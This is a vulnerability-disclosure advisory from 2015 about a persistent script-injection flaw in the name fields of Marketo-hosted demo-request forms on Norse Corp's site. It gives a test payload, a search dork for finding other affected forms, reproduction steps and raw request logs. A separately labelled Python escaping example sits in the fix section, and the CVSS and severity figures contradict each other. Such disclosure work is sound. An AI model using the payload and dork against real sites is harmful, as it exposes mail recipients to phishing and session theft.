Marketo Cloud - Persistent Mail Encoding Vulnerability
Document Title:
===============
Marketo Cloud - Persistent Mail Encoding Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1321


Release Date:
=============
2015-01-13


Vulnerability Laboratory ID (VL-ID):
====================================
1321


Common Vulnerability Scoring System:
====================================
3.5


Product & Service Introduction:
===============================
Marketo Inc. makes marketing automation software for companies. In 2012, Marketo was ranked 78th on the Inc. 500, #7 among software 
companies, and #1 among marketing software companies.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Marketo )

Norse is the global leader in live attack intelligence. Norse delivers continuously-updated and unique Internet and darknet intel 
that helps organizations detect and block attacks that other systems miss. The superior Norse DarkMatter™ platform detects new 
threats and tags nascent hazards long before they're spotted by traditional 'threat intelligence' tools. Norse's globally 
distributed 'distant early warning' grid of millions of sensors, honeypots, crawlers and agents delivers unique visibility into 
the Internet - especially the darknets, where bad actors operate. The Norse DarkMatter™ network processes hundreds of terabytes 
daily and computes over 1,500 distinct risk factors, live, for millions of IP addresses every day. Norse products tightly 
integrate with popular SIEM, IPS and next-generation Firewall products to dramatically improve the performance, catch-rate 
and security return-on-investment of your existing infrastructure.

( Copy of the Vendor Homepage: http://www.norse-corp.com/about.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent mail encoding web vulnerability in the official Marketo cloud online-service web-application.



Vulnerability Disclosure Timeline:
==================================
2014-09-09:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-10:	Vendor Notification (Norse-Corp)
2014-09-12:	Vendor Response/Feedback (Norse-Corp informs Marketo)
2014-**-**:	Vendor Fix/Patch Notification (Barracuda Networks - Developer Team)
2015-01-13:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Norse Corp
Product: Norse Corp - Web Application (Online Service) 2014 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official Marketo cloud online-service web-application.
The vulnerability allows a remote attacker to inject their own malicious script code on the application side of the vulnerable 
web-application online-service.

The vulnerability is located in the web input form of the Marketo demo registration (request_demo.html) module. Remote attackers 
are able to register a request with persistent script code in the firstname and lastname values. The effect becomes visible in the outgoing 
email of the customer's web-server and could also affect other sections of the profile registered later. The attacker injects a payload and 
the service sends the resulting mail, with the attacker's own content, to another target user's email address. The filter of the web-server 
does not validate the mail context of the input submitted through the website. The result is an application-side script code execution in 
the mail header directly after the introduction word. The mail includes the registered user name (stored in the database) together with the 
payload and does not encode the input.

The wrongly encoded cloud forms are present on many well-known websites such as norse-corp, samsung, intel, canon, citrix, cropcam, enterasys, f5, 
kaspersky, sandisk, sony and panasonic. The fault does not lie with the customer who implements the form, because the input restrictions are 
processed through the cloud-stored form in the Marketo service. The web-server does not encode the input and returns the data under the wrong conditions.

The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a CVSS 
(Common Vulnerability Scoring System) count of 3.9. Exploitation of the mail encoding and web-server validation vulnerability requires low or medium 
user interaction and no privileged customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results 
in session hijacking, persistent phishing attacks, persistent redirects to external malicious sources and persistent manipulation of affected or connected 
module context.


Request Method(s):
				[+] POST

Vulnerable Module(s):
				[+] request_demo.html

Vulnerable Parameter(s):
				[+] Firstname
				[+] Lastname

Affected Module(s):
				[+] Marketo Notification Mail Service


Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers without a privileged application user account and with low user interaction.
For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.

Google Dork(s): (e.g. allinurl:leadCapture/save) 
https://encrypted.google.com/#q=allinurl%3AleadCapture%2Fsave&filter=0


Manual steps to reproduce the security vulnerability via the Norse Corp website ...

1. Open your browser and go to the customer website (http://www.norse-corp.com/)
2. Click the `Request a Demo` button at the top of the web-application service
3. Now enter a script code with a malicious test payload as firstname and lastname, and enter a random target user mail (test with your own!)
4. Save the settings by clicking the send message button in the form
Note: The server saves the POST method request values in the application database and processes them through the filter
5. The service sends a mail as notification to invite the customer to the demo online-service
Note: The reply goes back to the target mail from the main [email protected] postbox
6. The execution of the injected script code occurs in the outgoing notification mail next to the introduction context word `Hi`
7. Successful reproduction of the security vulnerability!


PoC: (Example Exploit Code)  Norse Corp Service Mail ([email protected])

<html>
<head>
<title>Thank You for Contacting Us!</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css"></head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>
Thank You for Contacting Us!</td></tr><tr><td><b>Von: </b>Norse <[email protected]></td></tr><tr><td><b>Datum: </b>
03.09.2014 16:11</td></tr></table><table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr><td><b>An:</b>
[email protected]</td></tr></table><br>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head>
<meta http-equiv="Content-Type" content="text/html; ">
<title></title></head>
<body ><div ><div class="mktEditable" id="edit_text_1" ><p>
<span style="font-family: arial, helvetica, sans-serif; font-size: 12px;">Hi "><img src="x">%20>"<iframe src=a>%20<iframe>,<br /> <br /> 
Thanks for contacting Norse.        A representative will be reaching out to you shortly.        
In the meantime, please feel free to visit the <a href=
"http://info.norse-corp.com/Q05L0JN0OF2BN0e0R00e5O1" target="_blank"
>Norse website</a> for additional information.        <br /> <br /> Norse is the global leader in live attack intelligence. 
Norse delivers continuously-updated and unique intelligence that helps organizations detect and block attacks – especially 
from the darknets - that other systems miss. The superior Norse DarkMatter™ platform detects new threats and tags nascent 
hazards long before they’re spotted by traditional “threat intelligence” tools.   <br /><br />We look 
forward to speaking with   you soon.       <br /> </span></p>
<p><span style="font-family: arial, helvetica, sans-serif; font-size: 12px;">Best<br /> Regards,</span></p>
<p><span style="font-size: 12px;"><span style="font-family: verdana,geneva;"><span style="font-family: arial, helvetica, sans-serif;">
Scott  Schneider</span><br /><span style="font-family: arial, helvetica, sans-serif;">Vice President of Sales</span><br />
<span style="font-family: arial, helvetica, sans-serif;">[email protected]</span></span><span style="font-family: verdana,geneva;">
<br /></span><span style="font-family: verdana,geneva;"> <br /></span></span></p></div>
</div><IMG SRC="http://info.norse-corp.com/trk?t=1&mid=NjgxLU9OTC0yOTM6MDoxNjE4OjI4Mjg6MDo1NDA6NzoxMzgyODM2LTE6bnVsbA%3D%3D" WIDTH="1" 
HEIGHT="1" BORDER="0" ALT="" />
<p><font face="Verdana" size="1">This email was sent to [email protected]. If you no longer wish to receive these emails you may 
<a href="http://info.norse-corp.com/u/Me0L0N0JO550R10fB0ON0G2"
>unsubscribe</a> at any time. </font> </p>
</body></html></body></html>

Note: The same issue could be located in the other reference form links that are present. 
For deeper analysis the issue has been reported to Norse Corp with the attached reference links.


PoC: Webinar with Rick Holland of Forrester - Actionable Intelligence: A Threat Intelligence Buyer's Guide Service Mail ([email protected])

<td width="51%" valign="top" ><div class="mktEditable" id="Left-Column" style="color:#000000; font-family:'Frutiger Roman',arial,verdana; font-size:12px; " >
<div><span style="font-family: arial, helvetica, sans-serif; font-size: 12px;">Hi [PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE #2],<br /><br /></span></div>
<div><span style="font-family: arial, helvetica, sans-serif; font-size: 12px;"> Today’s threat actors are more sophisticated than ever, and organizations need 
live attack intelligence that alerts them to emerging threats long before they become full-blown attacks that lead to sensitive data loss. Furthermore, organizations 
need the most current threat data available in order to protect their networks from incursions – they need real-time actionable intelligence. <br /><br /> 
Join us for the upcoming webinar, “Actionable Intelligence: A Threat Intelligence Buyer’s Guide” featuring Rick Holland, Principal Analyst at 
Forrester Research, and Jeff Harrell, Senior Director, Product Marketing at Norse, to learn how to evaluate the various threat intelligence offerings in the 
marketplace, and how to utilize them to prevent today’s advanced attacks. <br /><br /> In this webinar you will learn about: <br /> 
<ul><li>The criteria needed to effectively evaluate threat intelligence solutions that meet your organization's needs </li>
<li>The value of the different types and sources of internal and external threat intelligence</li>
<li>How best to utilize threat intelligence to realize a greater return on security investments and better protect your organization</li>
</ul><br />Feel free to <a href="http://info.norse-corp.com/wNJLe5ROB0000O1D00N2B0y" target="_blank"
>contact us</a> to learn more information.</span></div><ul></ul></div></td>


--- PoC Session Logs [POST] (Inject) ---

14:06:15.430[638ms][total 638ms] Status: 302[Found]
POST http://pages.norse-corp.com/index.php/leadCapture/save Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[152] Mime Type[text/html]
   Request Header:
      Host[pages.norse-corp.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://pages.norse-corp.com/WEB-DemoRequest_LP.html]
      Cookie[__utma=62177331.1558909612.1410519916.1410519916.1410519916.1; __utmb=62177331.17.10.1410519916; __utmc=62177331; __utmz=62177331.1410519916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1558909612.1410519916; _mkto_trk=id:681-ONL-293&token:_mch-norse-corp.com-1410519918900-26442; __rampmetrics_user=031E00D0-ABD1-4612-B248-3B6E9327E1DB; __rampmetrics_data=%7B%22rampmetrics_id%22%3A%22e1449d703d%22%2C%22uuid%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%2C%22rampmetrics_referring_url__c%22%3A%22undefined.%22%2C%22rampmetrics_inbound_url__c%22%3A%22%22%2C%22rampmetrics_destination_url__c%22%3A%22http%3A%2F%2Fwww.norse-corp.com%2F%22%2C%22rampmetrics_last_visited_url__c%22%3A%22http%3A%2F%2Fwww.norse-corp.com%2Frequest_demo.html%22%2C%22rampmetrics_referring_domain__c%22%3A%22undefined.%22%2C%22rampmetrics_form_type__c%22%3A%22normal%22%2C%22rampmetrics_person_id__c%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%7D; BIGipServersj01web_login_http=67633162.20480.0000; _gat=1; __csess=1410525020184.58GBI8.; __cdrop=.92BA4D.]
      Connection[keep-alive]
   POST-Daten:
      FirstName[%5BSCRIPT+CODE+PAYLOAD+%231%5D]
      LastName[%5BSCRIPT+CODE+PAYLOAD+%232%5D]
      Email[bkm%40evolution-sec.com]
      Phone[01478348732]
      Company[%5BSCRIPT+CODE+PAYLOAD+%233%5D]
      Product__c_lead[DarkViking]
      Comments__c[]
      rampmetrics_UTM_Campaign__c[NULL]
      rampmetrics_UTM_Content__c[NULL]
      rampmetrics_UTM_Medium__c[NULL]
      rampmetrics_UTM_Source__c[NULL]
      rampmetrics_UTM_Term__c[NULL]
      rampmetrics_Search_Phrase__c[]
      rampmetrics_Referring_URL__c[]
      rampmetrics_Referring_Domain__c[]
      rampmetrics_Person_ID__c[]
      rampmetrics_Last_Visited_URL__c[]
      rampmetrics_Last_URL_Before_Form__c[]
      rampmetrics_Landing_Page_URL__c[]
      rampmetrics_Form_Fill_Out_URL__c[]
      rampmetrics_Destination_URL__c[]
      rampmetrics_Campaign_ID__c[]
      _marketo_comments[]
      lpId[467]
      subId[226]
      munchkinId[681-ONL-293]
      kw[not+found]
      cr[not+found]
      searchstr[not+found]
      lpurl[http%3A%2F%2Fpages.norse-corp.com%2FWEB-DemoRequest_LP.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D]
      formid[115]
      returnURL[http%3A%2F%2Fpages.norse-corp.com%2FWEBDemoRequest_ContentTemplate_ThankYou.html]
      retURL[http%3A%2F%2Fpages.norse-corp.com%2FWEBDemoRequest_ContentTemplate_ThankYou.html]
      returnLPId[459]
      _mkt_disp[return]
      _mkt_trk[id%3A681-ONL-293%26token%3A_mch-norse-corp.com-1410519918900-26442]
      _comments_marketo[]
      _mkto_version[2.4.7]
      MarketoSocialSyndicationId[]
   Response Header:
      Server[nginx]
      Date[Fri, 12 Sep 2014 12:06:18 GMT]
      Content-Type[text/html]
      Content-Length[152]
      Connection[keep-alive]
      Location[http://pages.norse-corp.com/WEBDemoRequest_ContentTemplate_ThankYou.html?aliId=822273]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]


14:06:16.069[725ms][total 725ms] Status: 200[OK]
GET http://pages.norse-corp.com/WEBDemoRequest_ContentTemplate_ThankYou.html?aliId=822273 Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[2690] Mime Type[text/html]
   Request Header:
      Host[pages.norse-corp.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://pages.norse-corp.com/WEB-DemoRequest_LP.html]
      Cookie[__utma=62177331.1558909612.1410519916.1410519916.1410519916.1; __utmb=62177331.17.10.1410519916; __utmc=62177331; 
__utmz=62177331.1410519916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1558909612.1410519916; 
_mkto_trk=id:681-ONL-293&token:_mch-norse-corp.com-1410519918900-26442; __rampmetrics_user=031E00D0-ABD1-4612-B248-3B6E9327E1DB; 
__rampmetrics_data=%7B%22rampmetrics_id%22%3A%22e1449d703d%22%2C%22uuid%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%2C%22rampmetrics_
referring_url__c%22%3A%22undefined.%22%2C%22rampmetrics_inbound_url__c%22%3A%22%22%2C%22rampmetrics_destination_url__
c%22%3A%22http%3A%2F%2Fwww.norse-corp.com%2F%22%2C%22rampmetrics_last_visited_url__c%22%3A%22http%3A%2F%2Fwww.norse-corp.com
%2Frequest_demo.html%22%2C%22rampmetrics_referring_domain__c%22%3A%22undefined.%22%2C%22rampmetrics_form_type__c%22%3A%22normal%22%2C%22rampmetrics_person_id__
c%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%7D; BIGipServersj01web_login_http=67633162.20480.0000; _gat=1; __csess=1410525020184.58GBI8.; __cdrop=.92BA4D.]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 12 Sep 2014 12:06:19 GMT]
      Content-Type[text/html; charset=utf-8]
      Content-Length[2690]
      Connection[keep-alive]
      P3P[CP="CAO CURa ADMa DEVa TAIa OUR IND UNI COM NAV INT"]
      Vary[*,Accept-Encoding]
      Content-Encoding[gzip]


Reference(s):
http://www.norse-corp.com/
http://www.norse-corp.com/request_demo.html
http%3A%2F%2Fpages.norse-corp.com%2FWEBDemoRequest_ContentTemplate_ThankYou.html
http://pages.norse-corp.com/index.php/leadCapture/save
-
http://www.norse-corp.com/contact.html
http://pages.norse-corp.com/WEBPartnerRequest.html


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely encoding and parsing the firstname and lastname values in the registration forms.
Restrict the input and disallow the usage of special chars to prevent further mail encoding script code attacks with an application-side vector.
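As an added defensive illustration (not code from the advisory, Marketo or Norse), the following Python shows the two fixes this section recommends, applied to the demo-form scenario described under Technical Details: an allow-list check on the FirstName/LastName values, and HTML-escaping of the stored values at the point they are inserted into the notification mail template. The sample submissions, the mail template and all function names are constructed for this example.

```python
import html
import re

# Constructed sample submissions (not taken from the advisory). The first one
# mimics a name field carrying markup, the second is an ordinary customer name.
SAMPLE_SUBMISSIONS = [
    {"FirstName": '"><img src="x">', "LastName": "<iframe src=a>"},
    {"FirstName": "Scott", "LastName": "O'Brien-Schneider"},
]

# Input restriction: names start with a letter and may contain letters, spaces,
# apostrophes, dots and hyphens (max 80 chars). Angle brackets, quotes, '=' and
# other special characters are rejected before anything is stored.
NAME_RE = re.compile(r"^[A-Za-z\u00C0-\u00FF][A-Za-z\u00C0-\u00FF' .-]{0,79}$")

# Constructed stand-in for the mail template that greets the registered user.
TEMPLATE = ('<p><span style="font-size: 12px;">Hi {first} {last},<br /><br />'
            'Thanks for contacting us.</span></p>')


def validate_name(value: str) -> bool:
    """Allow-list check for the FirstName / LastName form values."""
    return NAME_RE.fullmatch(value) is not None


def render_greeting_unescaped(first: str, last: str) -> str:
    """The behaviour the advisory describes: stored values pasted verbatim into
    the HTML mail, so markup in a name becomes markup in the message."""
    return TEMPLATE.format(first=first, last=last)


def render_greeting(first: str, last: str) -> str:
    """Hardened version: HTML-encode the values at the insertion point. The
    payload may still be stored, but the mail client sees text, not tags."""
    return TEMPLATE.format(first=html.escape(first, quote=True),
                           last=html.escape(last, quote=True))


def body_has_only_template_markup(body: str) -> bool:
    """Outbound check: the rendered body may contain exactly the tags of the
    static template and nothing more. Escaped values add no '<' characters,
    so any surplus '<' means user-supplied markup slipped through."""
    return body.count("<") == TEMPLATE.count("<")


def process_submission(submission: dict) -> dict:
    """Apply both layers: reject bad input, and encode on output regardless."""
    first, last = submission["FirstName"], submission["LastName"]
    if not (validate_name(first) and validate_name(last)):
        return {"accepted": False, "body": None}
    body = render_greeting(first, last)
    return {"accepted": True, "body": body,
            "clean": body_has_only_template_markup(body)}


if __name__ == "__main__":
    for sub in SAMPLE_SUBMISSIONS:
        print(process_submission(sub))
        # Even if the input check were bypassed, encoding alone neutralises it:
        print(body_has_only_template_markup(
            render_greeting(sub["FirstName"], sub["LastName"])))
```

The outbound count check is deliberately strict: it flags any extra tag in the greeting, so a template change must be mirrored in TEMPLATE or the check will reject every mail.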



Security Risk:
==============
The security risk of the persistent mail encoding validation web vulnerability in the registration form is estimated as medium. (CVSS 3.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ([email protected]) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    [email protected] 	- [email protected] 	       		- [email protected]
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
([email protected] or [email protected]) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory [Evolution Security]